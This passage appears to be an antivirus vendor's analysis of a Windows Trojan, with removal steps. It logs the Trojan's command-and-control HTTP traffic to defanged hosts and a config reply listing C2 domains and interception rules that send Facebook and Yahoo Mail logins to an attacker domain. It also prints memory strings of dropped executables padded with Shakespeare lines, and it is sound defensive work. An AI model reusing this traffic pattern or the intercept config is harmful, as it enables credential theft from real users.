href="hXXp://box661.bluehost.com/suspended.page/disabled.cgi/davedekil
ai.com?method=validate&mode=sox&v=029&sox=3c801802">her
e</a>.</p>.<hr>.<address>Apache Server at dave
dekilai.com Port 80</address>.</body></html>...

GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 HTTP/1.0

Accept: */*

Connection: close

Host: stickmarch.net

HTTP/1.1 200 OK

Date: Wed, 14 May 2014 10:29:46 GMT

Server: Apache

Vary: Accept-Encoding,User-Agent

Content-Length: 2599

Keep-Alive: timeout=5, max=125

Connection: close

Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://stickmarch.net/?fp=NW2h08TAj7gbVUttw+
xPVWVSFWaTBxrHiZqdPXCM1svDvDZj3S/1NgrSEz9Zu3JEf1rzQ1hcG7ba3OfbEsRspw
==&prvtof=BE7b74bkKxSMO7Gg0oA8cRYUY8mdRLyJ08mI642nGpw=&poru=j3wd
AEauXXLonOEwgYzkE0rLayDJqs4fehr/PbrJnRo25j0kvK5KhU9dGDWdrqBRppKA4ZZK
zKtGzaPXdobpSgRWz6YnX2Rszj56RoLJeEGzYxD11+GjaWk3jBXTGY6f&cifr=1&meth
od=validate&mode=sox&v=023&sox=3c801802";.../*..-->..<script typ
e="text/javascript">...<!--...dimensionUpdated = 0;...function a
pplyFrameKiller()...{....if(window.top != self)....{.....cHeight = 0;.
....if( typeof( window.innerHeight ) != 'undefined' ) {.....//Non-IE..
...cHeight = window.innerHeight;.....dimensionUpdated = 1;.....} else 
if( document.documentElement && ( document.documentElement.clientWidth
 || document.documentElement.clientHeight )  ) {.....//IE 6  in 'stand
ards compliant mode'.....cHeight = document.documentElement.clientHeig
ht;.....dimensionUpdated = 1;.....} else if( document.body && ( docume
nt.body.clientWidth || document.body.clientHeight ) ) {.....//IE 4 com
patible.....cHeight = document.body.clientHeight;.....dimensionUpdated
 = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1).....{.
.....window.top.location = "hXXp://stickmarch.net/?fp=NW2h08TAj7gbVUtt
w+xPVWVSFWaTBxrHiZqdPXCM1svDvDZj3S/1NgrSEz9Zu3JEf1rzQ1hcG7ba3OfbEs
Rspw==&prvtof=mAULZ+n4ckB2+bP0yNbRC+IDToxI3XfDbcsX4+bvyh4%
3D&poru=40svIkffRVdZYCtF0u6SMdx3r87rr1LbQln9I6FyWtoUkyyyJ8sgXZtP9WLY2Y
B8SPUktXhCTsr/xkPQ/MblgiNO7KnE2MHpPpHuZe9cvGEAGJTLRRhbzs2iego1
<<< skipped >>>

GET /forum/search.php?method=checkport&port=28929&mode=sox&v=023&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: groupcook.net

HTTP/1.1 200 OK

Date: Wed, 14 May 2014 10:29:53 GMT

Server: Apache/2

Content-Length: 0

Connection: close

Content-Type: text/html

GET /index.php?method=validate&mode=sox&v=029&sox=3c801802 HTTP/1.0

Accept: */*

Connection: close

Host: groupcook.net

HTTP/1.1 200 OK

Date: Wed, 14 May 2014 10:30:32 GMT

Server: Apache/2

Connection: close

Content-Type: text/html
304...sS........groupcook.net................n.i`.....#.........}K `.l
$aC".x...Q@W?6.]...~.;"..w7..P..4.5K|...$.xB.B..N;S.....B.A3..7%*.....
1h>.T0.n...H..~.i\.*.OC..9...Mqp.u..w?.Qn....>.......F..,..oDi.8
P..H.....,.W.l....9R.\.]a_.W..... ..r.>.......W!.i........C.P..$^".
p.... .MR.....$....TU..1-....n:.e.......HI....In...Mb.....Rm.N|lH.-(..
.I.18.........>.).Hx....!.xd^.}..q.o...uio8.CW&}........cb......~.z
6....k,.&f.....(....pr........u...,...N=.Vv.F.......}.%.i.....R..kr.l.
.N.y/.9.G..,.[...c.c....4....Vp4...X...).{[email protected]#`.1....&g
t;'....W.Q.|.........P.L......P.5.b. Dj/..Y,.]......k.|.F..-....{jC.)l
..C.?....C...B.'..l..\I..B\y..,y...0]..iT..-#.....w?.."4YF.5M=i.DD....
=.j8......C...1jQ.,!...;...RR.2..3...x.............tu..u..MW....01.*.L
D.D.~............;..i...ks.N.I....vf..m..8Dk'u..G...R.....Z..>..0..
wMj._u.Hv.f.(..F.LW../x.GB...1.....{....{.._.U...;6LX&.Gu...........:)
....W~1./..~.....Q... .s..bs..-%.&...$.].......w.?.D...B./..|c.2w..3..
....m..u&5......X.f...$...k.-Y..l.g:a....<....Zm.9....I ..$.C.'....
Z....y.X.fg..k#`...W...T.......|j...r..X..Z......t.}...J.R1.$_.s.H.s..
...S .U9$.k......G......4.\......7.:.\e..*$.;....Mb.8.......^..N. ....
}X.T..f.,[email protected]....".Y.........a)\.........ow........

GET /forum/search.php?method=all&flag&mode=sox&v=023&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: groupcook.net

HTTP/1.1 200 OK

Date: Wed, 14 May 2014 10:30:11 GMT

Server: Apache/2

Connection: close

Content-Type: text/html
ping.5.FLAG cfg.318."tablefruit.net" "frontride.net" "thistomorrow.net
" "gentlefriend.net" "saltsecond.net" "wifeknew.net" "signarmy.net" "u
ponloud.net" "whichsing.net" "spokethere.net" "necessarydress.net" "mi
ghtglossary.net" "wrongthrew.net" "wifeyesterday.net" "southblood.net"
 "rememberpaint.net" "littleappear.net" "lasopeidres.com" var_user_ip.
384.%set_intercepts% = ""VVV.facebook.com" "partyorderly.net" "/fb_log
in/" "/login/" "1" "facebook.com" "partyorderly.net" "/fb_login/" "/lo
gin/" "0" "mail.yahoo.com" "partyorderly.net" "/yahoo/" "/config/" "0"
 ";.Þp_host% = "partyorderly.net";.Þp_path% = "/dep/";.%no_passwor
d% = "0";.%timer% = "1200";.%cpuinfo% = " Intel(R) Atom(TM) CPU K510 @
 1.66GHz (1666 MHz)";.%state% = "BU";..............

GET /index.php?method=validate&mode=sox&v=029&sox=3c801802 HTTP/1.0

Accept: */*

Connection: close

Host: stickmarch.net

HTTP/1.1 200 OK

Date: Wed, 14 May 2014 10:30:30 GMT

Server: Apache

Vary: Accept-Encoding,User-Agent

Content-Length: 2593

Keep-Alive: timeout=5, max=126

Connection: close

Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://stickmarch.net/?fp=RpovpAuC9ow5NmSXYSbY
sAXW1b73tgquI4E1/CwV/Wj6ETs9V0ofVKvKbqDKjJD3SK789uoMvj1F7no0hWD7Kg
==&prvtof=I3dbGXzv5zNA35ev750NKcXNaDpkuIgs1pDEwcENjEc=&poru=CXYq
jTCPXoqD25L1oVyRCcXS69zxD9DQVU8Lo/+hqZ2ak/mOtqkXrPaUCVs3/SIsEW
iWZvYinWTYyaum7A1EoqVJEpy2wKADX0luiv1zlZ39qs+KKM+2wZN8/UmQweNp&c
ifr=1&method=validate&mode=sox&v=029&sox=3c801802";.../*..-->..<
script type="text/javascript">...<!--...dimensionUpdated = 0;...
function applyFrameKiller()...{....if(window.top != self)....{.....cHe
ight = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....
//Non-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;..
...} else if( document.documentElement && ( document.documentElement.c
lientWidth || document.documentElement.clientHeight )  ) {.....//IE 6 
 in 'standards compliant mode'.....cHeight = document.documentElement.
clientHeight;.....dimensionUpdated = 1;.....} else if( document.body &
& ( document.body.clientWidth || document.body.clientHeight ) ) {.....
//IE 4 compatible.....cHeight = document.body.clientHeight;.....dimens
ionUpdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated ==
 1).....{......window.top.location = "hXXp://stickmarch.net/?fp=RpovpA
uC9ow5NmSXYSbYsAXW1b73tgquI4E1/CwV/Wj6ETs9V0ofVKvKbqDKjJD3SK789uoM
vj1F7no0hWD7Kg==&prvtof=iIrQ4D05RxmqJCCqMbYJyWfc0J2NhXH1fj4rhcgAyt
M=&poru=0UT14yB9hwcBlx7MVz01pmfo6xBSj243Qt4wm1dq4bawCEoGNAQwgbgCPVfI
cGbU02sDo6trGumf+hovPOidEGPSbsMOv4RcY7tJgdAAZJK+Y+ZvwfWH1bww
<<< skipped >>>

GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 HTTP/1.0

Accept: */*

Connection: close

Host: laloponea.com

HTTP/1.1 404 Not Found

Date: Wed, 14 May 2014 10:29:43 GMT

Server: Apache/2

Accept-Ranges: bytes

Content-Length: 21

Cache-control: no-store

Pragma: no-cache

Connection: close

Content-Type: text/html
Unknown Virtual Host...

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

QSSSSSSh

j.PVf

}<%uy

~NSSSh

\$xSSShp

SSSh`vD

u#SSSh uC

tgSSSh

SSSh0

vSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

WS2_32.dll

OLEAUT32.dll

cmd.exe

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

portuguese-brazilian

operator

GetProcessWindowStation

USER32.DLL

GDI32.dll

GetProcessHeap

KERNEL32.dll

GetKeyboardType

USER32.dll

GetCPInfo

GetConsoleOutputCP

rtfrebrgje.exe

zo4u.exe

Services Portable Audio Compatibility Class

[email protected]

dklhlsph.exe

mIB.Ts

.gHw?

aB.Bcr

.Py0?

es`%sDh

' RB%S>

zcÁ

%Documents and Settings%\LocalService

%WinDir%\TEMP\smp5hldgdxzo4u.exe

mscoree.dll

KERNEL32.DLL

rtfrebrgje.exe_1104:

.text

`.rdata

@.data

QSSSSSSh

SQSSSh

-yr%XWf

SSSh0

SSSh@

u#SSSh@

t>SSSh`

t!SSSh

FSSSh

vSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

WS2_32.dll

OLEAUT32.dll

cmd.exe

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

portuguese-brazilian

operator

GetProcessWindowStation

USER32.DLL

GDI32.dll

KERNEL32.dll

USER32.dll

GetCPInfo

GetConsoleOutputCP

GetProcessHeap

See how the surly Warwick mans the wall!

O unbid spite! is sportful Edward come?

I am so sorry for my trespass made

O passing traitor, perjured and unjust!

rtfrebrgje.exe

zr.exe

Services Portable Audio Compatibility Class

dklhlsph.exe

Then put up your pipes in your bag, for I'll away:

[Exeunt]

an into their estimation and report: but he hath so

ingrateful injury; to report otherwise, were a

good compass: and now I live out of all order, out

of all compass.

Look on his letter, madam; here's my passport.

Like lies disdain'd in the reporting.

Report thy parentage. I think thou said'st

c.umd.edu>, and submitted to the SHAKSPER Global

Electronic Conference  in October 1991.

TO.THE.ONLIE.BEGETTER.OF.

THESE.INSVING.SONNETS.

Mr.W.H.ALL.HAPPINESSE.

AND.THAT.ETERNITIE.

OVR.EVER-LIVING.POET.

THE.WELL-WISHING.

ADVENTVRER.IN.

}.Gz|?q! 

\.BTz

Certain ones then.

Shalt have thy trespass cited up in rhymes,

That sought to be encompass'd with your crown:

Nor thou within the compass of my curse.

Nor no one here; for curses never pass

Nay, that's certain; we have the exhibition to examine.

led to execution]

They shall have none, I swear, but these my joints;

@Ÿy

.sKN$w

This beauteous lady Thisby is certain.

[Exeunt Prologue, Thisbe, Lion, and Moonshine]

i[2.LXt

.yDp\

her as long as there is a passage in my throat and

before the priest; and certainly a woman's thought

than a monkey: I will weep for nothing, like Diana

Did point you to buy them, along as you pass'd:

And since I have not much importuned you;

Who having, by their own importunate suit,

to conceive, nor his heart to report, what my dream

transported.

if our sport had gone forward, we had all been made

To ask of whence you are. Report it.

[Knocking within. Enter a Porter]

Porter

man were porter of hell-gate, he should have

old turning the key.

Yzd of great import indeed, too, but let

that pass: for I must tell thee, it will please his

heart, let that pass. By the world, I recount no

fable: some certain special honours it pleaseth his

travel, that hath seen the world; but let that pass.

For princes to come view fair Portia:

As o'er a brook, to see fair Portia.

Lies all within. Deliver me the key:

PORTIA

Portia, adieu. I have :

Do so conjointly meet, let not men s

[Exeunt KING LEAR, GLOUCESTER, KENT, and Fool]

And I a heavy interim shall support

He cannot temperately transport his honours

In execution.

Whose father then, as men report

The time is out of joint: O cursed spite,

By this encompassment and drift of question

that our armies join not in a hot day; for, by the

.rgGD

and QUINTUS, bound, passing on to the place of

istook your passion;

Here, all enraged, such passion her assails,

To have proved most royally: and, for his passage,

[A dead march. Exeunt, bearing off the dead

I speak from certainties. Nay, more,

To hurl upon their heads that break his law.

And that same vengeance doth he hurl on thee,

Of dear import, and the neglecting it

it agrees well, passant; it is a familiar beast to

But your request shall make me let it pass.

Is this certain?

purse; I could have filed keys off that hung in

By God's fair ordinance conjoin together!

Bury it certain fathoms in the earth,

before the report come. If there be breadth enou

With willing sport to the wild ocean.

[Exeunt HUBERT with PETER]

The abuse of greatness is, when it disjoins

[Exeunt Pyramus and Thisbe]

themselves, they may pass for excellent men. Here

Then know that I, one Snug the joiner, am

[Exeunt all but BENEDICK and BEATRICE]

My master is of churlish disposition

Go with me: if you like upon report

of; which imports to the kingdom so much

Over her passion; who, most rebel-like,

But if you fondly pass our proffer'd offer,

I wish ye sport.

Experience, O, thou disprovest report!

Making lascivious comments on thy sport,

Naming thy name blesses an ill report.

Some say thy grace is youth and gentle sport;

I fear'd thy fortune, and my joints did tremble.

And from the organ-pipe of frailty sings

It would not out at windows nor at doors.

[Flourish. Exeunt]

And good supporters are you.

Each one with ireful passion, with drawn swords,

Sport and repose lock from me day and night!

So 'tis reported:

Hortensio's passion;

[Exeunt BIANCA and Servant]

Shall find him by his large and portly size.

And the very ports they blow,

My true love's passion: therefore pardon me,

say, you cannot pass. Therefore, go back.

[Exeunt CORIOLANUS and AUFIDIUS. The two

false report of him.

come to pass, say Pompey told you so.

Yet are they passing cowardly. But, I beseech you,

[Exeunt FALSTAFF and Justices]

Be avised, sir, and pass good humours: I will say

so conclusions passed the careires.

And, kinsmen, then we may go pipe for justice.

Join with the Goths; and with revengeful war

Sport royal, I warrant you: I know my physic will

but from proof as strong as my grief and as certain

her life: I shall give thee opportunity at

where, if thou fear to strike and to make me certain

in several disports. Whereupon the nobqUY

[Exeunt Citizens]

'His browny locks did hang in crooked curls;

Upon his lips their silken parcels hurls.

zcÁ

%System%\dklhlsph.exe

|groupcook.net

WATCHDOGPROC "c:\windows\system32\rtfrebrgje.exe"

%System%\rtfrebrgje.exe

mscoree.dll

KERNEL32.DLL

ihj3deeem5zr.exe_704:

.text

`.rdata

@.data

QSSSSSSh

SQSSSh

-yr%XWf

SSSh0

SSSh@

u#SSSh@

t>SSSh`

t!SSSh

FSSSh

vSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

WS2_32.dll

OLEAUT32.dll

cmd.exe

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

portuguese-brazilian

operator

GetProcessWindowStation

USER32.DLL

GDI32.dll

KERNEL32.dll

USER32.dll

GetCPInfo

GetConsoleOutputCP

GetProcessHeap

See how the surly Warwick mans the wall!

O unbid spite! is sportful Edward come?

I am so sorry for my trespass made

O passing traitor, perjured and unjust!

rtfrebrgje.exe

zr.exe

Services Portable Audio Compatibility Class

dklhlsph.exe

Then put up your pipes in your bag, for I'll away:

[Exeunt]

an into their estimation and report: but he hath so

ingrateful injury; to report otherwise, were a

good compass: and now I live out of all order, out

of all compass.

Look on his letter, madam; here's my passport.

Like lies disdain'd in the reporting.

Report thy parentage. I think thou said'st

c.umd.edu>, and submitted to the SHAKSPER Global

Electronic Conference  in October 1991.

TO.THE.ONLIE.BEGETTER.OF.

THESE.INSVING.SONNETS.

Mr.W.H.ALL.HAPPINESSE.

AND.THAT.ETERNITIE.

OVR.EVER-LIVING.POET.

THE.WELL-WISHING.

ADVENTVRER.IN.

}.Gz|?q! 

\.BTz

Certain ones then.

Shalt have thy trespass cited up in rhymes,

That sought to be encompass'd with your crown:

Nor thou within the compass of my curse.

Nor no one here; for curses never pass

Nay, that's certain; we have the exhibition to examine.

led to execution]

They shall have none, I swear, but these my joints;

@Ÿy

.sKN$w

This beauteous lady Thisby is certain.

[Exeunt Prologue, Thisbe, Lion, and Moonshine]

i[2.LXt

.yDp\

her as long as there is a passage in my throat and

before the priest; and certainly a woman's thought

than a monkey: I will weep for nothing, like Diana

Did point you to buy them, along as you pass'd:

And since I have not much importuned you;

Who having, by their own importunate suit,

to conceive, nor his heart to report, what my dream

transported.

if our sport had gone forward, we had all been made

To ask of whence you are. Report it.

[Knocking within. Enter a Porter]

Porter

man were porter of hell-gate, he should have

old turning the key.

Yzd of great import indeed, too, but let

that pass: for I must tell thee, it will please his

heart, let that pass. By the world, I recount no

fable: some certain special honours it pleaseth his

travel, that hath seen the world; but let that pass.

For princes to come view fair Portia:

As o'er a brook, to see fair Portia.

Lies all within. Deliver me the key:

PORTIA

Portia, adieu. I have :

Do so conjointly meet, let not men s

[Exeunt KING LEAR, GLOUCESTER, KENT, and Fool]

And I a heavy interim shall support

He cannot temperately transport his honours

In execution.

Whose father then, as men report

The time is out of joint: O cursed spite,

By this encompassment and drift of question

that our armies join not in a hot day; for, by the

.rgGD

and QUINTUS, bound, passing on to the place of

istook your passion;

Here, all enraged, such passion her assails,

To have proved most royally: and, for his passage,

[A dead march. Exeunt, bearing off the dead

I speak from certainties. Nay, more,

To hurl upon their heads that break his law.

And that same vengeance doth he hurl on thee,

Of dear import, and the neglecting it

it agrees well, passant; it is a familiar beast to

But your request shall make me let it pass.

Is this certain?

purse; I could have filed keys off that hung in

By God's fair ordinance conjoin together!

Bury it certain fathoms in the earth,

before the report come. If there be breadth enou

With willing sport to the wild ocean.

[Exeunt HUBERT with PETER]

The abuse of greatness is, when it disjoins

[Exeunt Pyramus and Thisbe]

themselves, they may pass for excellent men. Here

Then know that I, one Snug the joiner, am

[Exeunt all but BENEDICK and BEATRICE]

My master is of churlish disposition

Go with me: if you like upon report

hK

of; which imports to the kingdom so much

Over her passion; who, most rebel-like,

But if you fondly pass our proffer'd offer,

I wish ye sport.

Experience, O, thou disprovest report!

Making lascivious comments on thy sport,

Naming thy name blesses an ill report.

Some say thy grace is youth and gentle sport;

I fear'd thy fortune, and my joints did tremble.

And from the organ-pipe of frailty sings

It would not out at windows nor at doors.

[Flourish. Exeunt]

And good supporters are you.

Each one with ireful passion, with drawn swords,

Sport and repose lock from me day and night!

So 'tis reported:

Hortensio's passion;

[Exeunt BIANCA and Servant]

Shall find him by his large and portly size.

And the very ports they blow,

My true love's passion: therefore pardon me,

say, you cannot pass. Therefore, go back.

[Exeunt CORIOLANUS and AUFIDIUS. The two

false report of him.

come to pass, say Pompey told you so.

Yet are they passing cowardly. But, I beseech you,

[Exeunt FALSTAFF and Justices]

Be avised, sir, and pass good humours: I will say

so conclusions passed the careires.

And, kinsmen, then we may go pipe for justice.

Join with the Goths; and with revengeful war

Sport royal, I warrant you: I know my physic will

but from proof as strong as my grief and as certain

her life: I shall give thee opportunity at

where, if thou fear to strike and to make me certain

in several disports. Whereupon the nobqUY

[Exeunt Citizens]

'His browny locks did hang in crooked curls;

Upon his lips their silken parcels hurls.

zcÁ

%WinDir%\TEMP\ihj3deeem5zr.exe

mscoree.dll

KERNEL32.DLL

dklhlsph.exe_2108:

.text

`.rdata

@.data

QSSSSSSh

SQSSSh

-yr%XWf

SSSh0

SSSh@

u#SSSh@

t>SSSh`

t!SSSh

FSSSh

vSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

WS2_32.dll

OLEAUT32.dll

cmd.exe

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

portuguese-brazilian

operator

GetProcessWindowStation

USER32.DLL

GDI32.dll

KERNEL32.dll

USER32.dll

GetCPInfo

GetConsoleOutputCP

GetProcessHeap

See how the surly Warwick mans the wall!

O unbid spite! is sportful Edward come?

I am so sorry for my trespass made

O passing traitor, perjured and unjust!

rtfrebrgje.exe

zr.exe

Services Portable Audio Compatibility Class

dklhlsph.exe

Then put up your pipes in your bag, for I'll away:

[Exeunt]

an into their estimation and report: but he hath so

ingrateful injury; to report otherwise, were a

good compass: and now I live out of all order, out

of all compass.

Look on his letter, madam; here's my passport.

Like lies disdain'd in the reporting.

Report thy parentage. I think thou said'st

c.umd.edu>, and submitted to the SHAKSPER Global

Electronic Conference  in October 1991.

TO.THE.ONLIE.BEGETTER.OF.

THESE.INSVING.SONNETS.

Mr.W.H.ALL.HAPPINESSE.

AND.THAT.ETERNITIE.

OVR.EVER-LIVING.POET.

THE.WELL-WISHING.

ADVENTVRER.IN.

}.Gz|?q! 

\.BTz

Certain ones then.

Shalt have thy trespass cited up in rhymes,

That sought to be encompass'd with your crown:

Nor thou within the compass of my curse.

Nor no one here; for curses never pass

Nay, that's certain; we have the exhibition to examine.

led to execution]

They shall have none, I swear, but these my joints;

@Ÿy

.sKN$w

This beauteous lady Thisby is certain.

[Exeunt Prologue, Thisbe, Lion, and Moonshine]

i[2.LXt

.yDp\

her as long as there is a passage in my throat and

before the priest; and certainly a woman's thought

than a monkey: I will weep for nothing, like Diana

Did point you to buy them, along as you pass'd:

And since I have not much importuned you;

Who having, by their own importunate suit,

to conceive, nor his heart to report, what my dream

transported.

if our sport had gone forward, we had all been made

To ask of whence you are. Report it.

[Knocking within. Enter a Porter]

Porter

man were porter of hell-gate, he should have

old turning the key.

Yzd of great import indeed, too, but let

that pass: for I must tell thee, it will please his

heart, let that pass. By the world, I recount no

fable: some certain special honours it pleaseth his

travel, that hath seen the world; but let that pass.

For princes to come view fair Portia:

As o'er a brook, to see fair Portia.

Lies all within. Deliver me the key:

PORTIA

Portia, adieu. I have :

Do so conjointly meet, let not men s

[Exeunt KING LEAR, GLOUCESTER, KENT, and Fool]

And I a heavy interim shall support

He cannot temperately transport his honours

In execution.

Whose father then, as men report

The time is out of joint: O cursed spite,

By this encompassment and drift of question

that our armies join not in a hot day; for, by the

.rgGD

and QUINTUS, bound, passing on to the place of

istook your passion;

Here, all enraged, such passion her assails,

To have proved most royally: and, for his passage,

[A dead march. Exeunt, bearing off the dead

I speak from certainties. Nay, more,

To hurl upon their heads that break his law.

And that same vengeance doth he hurl on thee,

Of dear import, and the neglecting it

it agrees well, passant; it is a familiar beast to

But your request shall make me let it pass.

Is this certain?

purse; I could have filed keys off that hung in

By God's fair ordinance conjoin together!

Bury it certain fathoms in the earth,

before the report come. If there be breadth enou

With willing sport to the wild ocean.

[Exeunt HUBERT with PETER]

The abuse of greatness is, when it disjoins

[Exeunt Pyramus and Thisbe]

themselves, they may pass for excellent men. Here

Then know that I, one Snug the joiner, am

[Exeunt all but BENEDICK and BEATRICE]

My master is of churlish disposition

Go with me: if you like upon report

hK

of; which imports to the kingdom so much

Over her passion; who, most rebel-like,

But if you fondly pass our proffer'd offer,

I wish ye sport.

Experience, O, thou disprovest report!

Making lascivious comments on thy sport,

Naming thy name blesses an ill report.

Some say thy grace is youth and gentle sport;

I fear'd thy fortune, and my joints did tremble.

And from the organ-pipe of frailty sings

It would not out at windows nor at doors.

[Flourish. Exeunt]

And good supporters are you.

Each one with ireful passion, with drawn swords,

Sport and repose lock from me day and night!

So 'tis reported:

Hortensio's passion;

[Exeunt BIANCA and Servant]

Shall find him by his large and portly size.

And the very ports they blow,

My true love's passion: therefore pardon me,

say, you cannot pass. Therefore, go back.

[Exeunt CORIOLANUS and AUFIDIUS. The two

false report of him.

come to pass, say Pompey told you so.

Yet are they passing cowardly. But, I beseech you,

[Exeunt FALSTAFF and Justices]

Be avised, sir, and pass good humours: I will say

so conclusions passed the careires.

And, kinsmen, then we may go pipe for justice.

Join with the Goths; and with revengeful war

Sport royal, I warrant you: I know my physic will

but from proof as strong as my grief and as certain

her life: I shall give thee opportunity at

where, if thou fear to strike and to make me certain

in several disports. Whereupon the nobqUY

[Exeunt Citizens]

'His browny locks did hang in crooked curls;

Upon his lips their silken parcels hurls.

zcÁ

%System%\dklhlsph.exe

mscoree.dll

KERNEL32.DLL

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   ihj3deeem5zr.exe:704
   ihj3dee6umzr.exe:3840
   smp5hldte9zo4u.exe:2780
   smp5hld7ljzo4upwykfp.exe:2236
   smp5hldgdxzo4u.exe:2804
   smp5hld8mfzo4u.exe:2560
   rtfrebrgje.exe:2956
   rtfrebrgje.exe:396
   rtfrebrgje.exe:1104
   %original file name%.exe:1964
   dklhlsph.exe:2108
   dklhlsph.exe:3676
   dklhlsph.exe:2720

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %System%\dsvmzzbluxpxh\tst (10 bytes)
   %System%\rtfrebrgje.exe (7547 bytes)
   %System%\dsvmzzbluxpxh\etc (10 bytes)
   %System%\drivers\etc\hosts (22 bytes)
   %System%\dsvmzzbluxpxh\rng (60 bytes)
   %WinDir%\Temp\smp5hldgdxzo4u.exe (5873 bytes)
   %System%\dsvmzzbluxpxh\run (10 bytes)
   %WinDir%\Temp\smp5hldte9zo4u.exe (26305 bytes)
   %System%\dsvmzzbluxpxh\cfg (110 bytes)
   %System%\dklhlsph.exe (5873 bytes)
   %WinDir%\Temp\smp5hld8mfzo4u.exe (35 bytes)
   %System%\dsvmzzbluxpxh\aol\zip.exe (10500 bytes)
   %System%\dsvmzzbluxpxh\aol\exefile (14580 bytes)
   %WinDir%\Temp\ihj3deeem5zr.exe (7547 bytes)
   %WinDir%\Temp\ihj3dee6umzr.exe (35 bytes)
   %System%\dsvmzzbluxpxh\ihst (222 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\smp5hld7ljzo4upwykfp.exe (3873 bytes)
   

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   "Block Controls Agent Upgrade" = "%System%\rtfrebrgje.exe"

5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
   127.0.0.1 localhost
   
6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.